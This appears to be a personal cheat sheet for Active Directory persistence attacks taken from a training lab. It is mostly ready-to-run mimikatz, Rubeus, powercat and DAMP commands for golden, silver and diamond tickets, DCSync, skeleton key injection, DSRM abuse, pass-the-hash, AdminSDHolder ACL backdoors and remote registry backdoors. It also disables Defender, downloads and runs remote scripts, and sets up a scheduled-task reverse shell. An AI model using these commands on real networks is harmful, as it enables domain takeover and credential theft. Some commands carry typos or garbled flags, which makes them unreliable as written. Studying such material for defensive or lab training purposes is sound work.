🔴Domain Presistance

Kerberos

It is a authentication method for Windows Active Directory How it works :-

1. User sends timestamp to KDC/DC and that timestamp is encrypted with user passwords hash (NTLM hash) to request a TGT

• TGT (Ticket Granting Ticket) is use to get us another TGS so that we can access any service

1. Then KDC/DC decrypts it as it already has password of every user, and after decrypting it sends the TGT which is encrypted with NTLM hash of krbtgt user

• krbtgt user is the special user account created by default. Its purpose is to act as a KDC (Key Distribution Centre) service account for domain controllers

1. Then user sends the TGT encrypted with krbtgt hash to request a TGS

• TGS (Ticket Granting Service) is used by user to access any service he wants

1. KDC/DC replies with TGS encrypted with service's NTLM hash

2. Then user connects to the server hosting that service using TGS

Golden Ticket Attack

breaking step 3 of kerberos if we are able to send a TGT to KDC by encrypting it with krbtgt user's hash which makes it valid TGT For this we need krbtgt user access as it is a DC account , for this we need domain admin privileges COMMANDS :-

1. disable defender or asmr

set-mpprefrence -DisableRealtimemonitoring $true

1. Download mimikatz

iex (iwr http://192.168.0.1/Invoke-mimikatz.ps1)

1. Load mimikatz in powershell

. C:AD\tools\invoke-Mimikatz.ps1

1. Execute mimikatz on Domain controller as Domain Admin to get krbtgt hash

Invoke-Mimikatz -command '"lsadump::lsa /patch"' -computername dcorp-dc

1. creating a golden ticket

invoke-mimikatz -command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:s-2-3-43-3456789-678904-456789 /krbtgt:cfrt678iujnmko987689o345rf098uh /id:500 /group:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Breakdown of the command :-

kerboros::golden module name /User:Administrator user name /domain:dollarcorp.moneycorp.local domain name /sid:s-2-3-43-3456789-678904-456789 sid of domain /krbtgt:cfrt678iujnmko987689o345rf098uh krbtgt user hash /id:500 /group:512 optional user RID (default 500) & group (512-520) /startoffset:0 optional when ticket is available /endin:600 optional ticket lifetime /renewmax:10080 optional ticket lifetime renewal /ptt or /ticket injects in current powershell session save a ticket in file

optional = run this command to get powershell session with domain admin privileges

invoke-mimikatz -command '"sekurlsa::pth /user:svcadmin /domain::dollarcorp.moneycorp.local /ntlm::asdfghjk1234asdfgt546fvgh /run::powershell.exe"'

$sess = new-pssession -computername dcorp-dc.dollarcorp.moneycorp.local

invoke-command -session $sess -filepath C:\ad\tools\Invoke-mimikatz.ps1

enter-pssession -session $sess

DCsync attack we can also get krbtgt hash using dcsync attack

Invoke-mimikatz -command '"lsadump::dcsync /user:<username>\krgbtgt"'

Silver Ticket attack

breaking step 5 of kerboros

1. use mimikatz to get hash of all users

Invoke-Mimikatz -command '"lsadump::lsa /patch"' -computername dcorp-dc

NOTE:- we need domain controller hash to create a silver ticket

2. creating silver ticket

invoke-mimikatz -command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:s-2-3-43-3456789-678904-456789 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:3456fghjk890bnmkl90kjdfnc39494 /User:Administrator /ptt"'

other services :- HOST , RPCSS , CIFS , WSMAN , WMI this command tell us what services we can use as domain controller , we can use this comand after injecting silver ticket

klist

command execution using silver ticket

1. crate a silver ticket for HOST SPN

invoke-mimikatz -command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:s-2-3-43-3456789-678904-456789 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:3456fghjk890bnmkl90kjdfnc39494 /User:Administrator /ptt"'

1. list all scheduled tasks

schtasks /S dcorp-dc.dollarcorp.moneycorp.local

1. Schedule a task

schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-object Net.Webclient).Downloadstring(''http://192.168.1.1/Invokepowershelltcp.ps1'')'"

it will download the reverse shell , make sure to customize it before executing

4. Turn on reverse shell listener

. C:AD\Tools\powercat.ps1

powercat- l -v -p 443 -t 1000

1. Execute that task

schtasks /run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck"

Diamond Ticket attack

C:\AD\Tools\Rubeus.exe diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Skeleton Key

It is a presistance technique to patch a domain controller (lsass process) so it can allow any user with single same password

1. Injecting Skeleton Key default pass = mimikatz

Invoke-mimikatz -command '"privilege::debug" "misc::skeleton"' -computername dcorp-dc.dollarcorp.moneycorp.local

1. After injecting we can access any machine we want with username & pass = mimikatz

enter-pssession -computername dcorp-dc -credential dcorp\Administrator

DSRM Directory service restore mode

Rarely changed The DSRM password is same of local admin (Administrator) password of DC dump DSRM password

invoke-mimikatz -command '"token::elevate" "lsadump::sam"' -computername dcorp-dc

After getting the hash , cross check the hash with

Invoke-Mimikatz -command '"lsadump::lsa /patch"' -computername dcorp-dc

if the hash is same we can perform pass the hash , but before using this hash we need to change the logon behaviour of DSRM

enter-pssession -computername dcorp-dc 

new-itemproperty "HKLM:\system\currentcontrolset\control\lsa\" -Name "DsrmAdminLogonBehavior" -value 2 -propertytype DWORD

or

set-itemproperty "HKLM:\system\currentcontrolset\control\lsa\" -Name "DsrmAdminLogonBehavior" -value 2 -propertytype DWORD

after changing the property we can check it

get-itemproperty "HKLM:\system\currentcontrolset\control\lsa\" 

Pass The Hash

invoke-mimikatz -command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:sdf567io56cvb78388x2n398 /run:powershell.exe"'

ls \\dcorp-dc\C$

AdminDSHolder

AdminSDHolder is used to maintain ACL or control permission for privileged groups (protected groups) SDPROP = Security Descriptor Propagator SDPROP is the process which runs every 60 min in the system , and when it runs it overwrites the ACL by AdminSDHolder ACL Protected Groups :-

• Account Operators

• Backup Operators

• Server Operators

• Print Operators

• Domain Admins

• Replicators

• Enterprise Admins

• Domain Controllers

• Read-only Domain Controllers

• Schema Admins

• Administrators

commands

Load SDpropagator

. C:AD\Tools\Invoke-SDPropagator.ps1

Invoke-SDPropagator -timeoutMinutes 1 -showprogress -verbose

Add fullcontrol permission for a user to adminsdholder as domain admin

add-objectacl -targetadsprefix 'CN=AdminSDHolder,CN=system' -principalsamaccountname studentx -rights all -verbose

get-objectacl -samaccountname "Domain Admins" -resolveguids | ?{$_.IndentifyRefrence -match 'studentadmin'}

Reset password for a user to adminsdholder

add-objectacl -targetadsprefix 'CN=AdminSDHolder,CN=system' -ResetPassword studentx -rights all -verbose

set-domainuserpassword -identity abcd -accountpassword (convertto-securestring "Password@123" -asplaintext -force) -verbose

Write Members for a user to adminsdholder

add-objectacl -targetadsprefix 'CN=AdminSDHolder,CN=system' -WriteMembers studentx -rights all -verbose

adding user to domain admin groups

add-ADGroupMember -identity 'Domain Admins' -members abcd -verbose

add rights for dcsync

add-objectacl -targetdistinguishedname 'DC=dollarcorp,DC=moneycorp,DC=local' -principalsamaccountname abcd -rights dcsync -verbose

execute dcsync

Invoke-mimikatz -command '"lsadump::dcsync /user:<username>\krgbtgt"'

Security Descriptors

it is use to modify security descriptors (security information :- owner , group , DACL , SACL)

commands

WMI

ACL can be modified using non admin access on local machine

set-remoteWMI username abcd -verbose

on remote machine without explicit credentials

set-remoteWMI username abcd -verbose -computername dcorp-dc -namespace 'root\cimv2' -verbose

on remote machine with explicit credentials

set-remoteWMI username abcd -verbose -computername dcorp-dc -credential Administrator -namespace 'root\cimv2' -verbose

on remote machine remove permission

set-remoteWMI username abcd -verbose -computername dcorp-dc -namespace 'root\cimv2' -remove -verbose

Powershell remoting

on local machine

set-remotePSRemoting -username abcd -verbose

on remote machine

set-remotePSRemoting -username abcd -computername dcorp-dc -verbose

on remote machine , remove permission

set-remotePSRemoting -username abcd -computername dcorp-dc -verbose

Remote registry

Load script

C:AD\Tools\DAMP-master\

..\Add-remoteregbackdoor.ps1

using DAMP with admin privs on remote machine

add-remoteRegBackdoor -computername dcorp-dc -trustee <username> -verbose

Retrieve hash

. C:AD\Tools\DAMP-master\RemoteHashRetrieval.ps1

machine account hash

get-remotemachineaccounthash -computername dcorp-dc -verbose

local account hash

get-remotelocalaccounthash -computername dcorp-dc -verbose

domain cache credentials

get-remotecachecredential -computername dcorp-dc -verbose